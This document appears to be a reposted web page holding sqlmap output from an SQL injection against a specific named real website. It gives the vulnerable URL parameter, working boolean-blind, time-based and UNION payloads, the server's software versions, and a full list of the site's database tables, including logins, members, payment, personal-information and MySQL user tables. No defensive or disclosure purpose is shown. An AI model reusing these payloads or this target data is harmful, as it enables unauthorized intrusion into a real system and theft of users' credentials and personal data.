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程序员文章站 2022-03-16 16:13:51
https://www.eaonline.com.cn/chargezone/chargeContent.dll?id=1000 https://www.eaonline.c...



Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1000 AND 4867=4867

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: id=1000 AND (SELECT * FROM (SELECT(SLEEP(5)))romR)

    Type: UNION query
    Title: Generic UNION query (NULL) - 13 columns
    Payload: id=-1160 UNION ALL SELECT NULL,NULL,CONCAT(0x71716a6271,0x4b635659414c526f736e535754657368654552735451486e776a444c64596d5045756b566f585854,0x717a766a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
[12:13:50] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5.0.12


Database: cheaa                                                            
[74 tables]
| b_logins                              |
| b_members                             |
| b_products                            |
| bbs                                   |
| bginfo                                |
| bid                                   |
| cheaa_bbsrt                           |
| cheaa_bginfo                          |
| cheaa_cpzs                            |
| cheaa_cpzstj                          |
| cheaa_jdrw                            |
| cheaa_zdyzt                           |
| cheaamembers                          |
| cheaaplbak                            |
| city                                  |
| column_name                           |
| commonproperty                        |
| content                               |
| customization                         |
| customize                             |
| eadgtj                                |
| ealmtt                                |
| enterprise                            |
| enterpriseinfo                        |
| enterpriseinfo_0813                   |
| enterpriseinfo_0815                   |
| flux                                  |
| info                                  |
| jituan                                |
| loginlevel                            |
| logins                                |
| logins_0815                           |
| m_info                                |
| members                               |
| members_0813                          |
| members_0815                          |
| operators                             |
| orders                                |
| payment                               |
| penster                               |
| permissions                           |
| personalinfo                          |
| piccp                                 |
| picly                                 |
| picnews                               |
| price                                 |
| privateproperty                       |
| productchildtype                      |
| producttype                           |
| propertyname                          |
| province                              |
| publish                               |
| publishbak3                           |
| rdpl                                  |
| re_bid                                |
| relations                             |
| source                                |
| survey                                |
| text                                  |
| titles                                |
| tongxunlu                             |
| toutiao                               |
| txl                                   |
| users                                 |
| vote                                  |
| voteip                                |
| wsdclilin                             |
| xi_pic                                |
| xiaolei                               |
| yewu                                  |
| yxz                                   |
| zdyzt                                 |
| zhuanti                               |
| ztlilin                               |

Database: information_schema
[28 tables]
| CHARACTER_SETS                        |
| COLLATIONS                            |
| COLUMNS                               |
| COLUMN_PRIVILEGES                     |
| ENGINES                               |
| EVENTS                                |
| FILES                                 |
| GLOBAL_STATUS                         |
| GLOBAL_VARIABLES                      |
| KEY_COLUMN_USAGE                      |
| PARTITIONS                            |
| PLUGINS                               |
| PROCESSLIST                           |
| PROFILING                             |
| ROUTINES                              |
| SCHEMATA                              |
| SCHEMA_PRIVILEGES                     |
| SESSION_STATUS                        |
| SESSION_VARIABLES                     |
| STATISTICS                            |
| TABLES                                |
| TABLE_CONSTRAINTS                     |
| TABLE_PRIVILEGES                      |
| TRIGGERS                              |
| USER_PRIVILEGES                       |
| VIEWS                                 |

Database: mysql
[23 tables]
| user                                  |
| columns_priv                          |
| db                                    |
| event                                 |
| func                                  |
| general_log                           |
| help_category                         |
| help_keyword                          |
| help_relation                         |
| help_topic                            |
| host                                  |
| ndb_binlog_index                      |
| plugin                                |
| proc                                  |
| procs_priv                            |
| servers                               |
| slow_log                              |
| tables_priv                           |
| time_zone                             |
| time_zone_leap_second                 |
| time_zone_name                        |
| time_zone_transition                  |
| time_zone_transition_type             |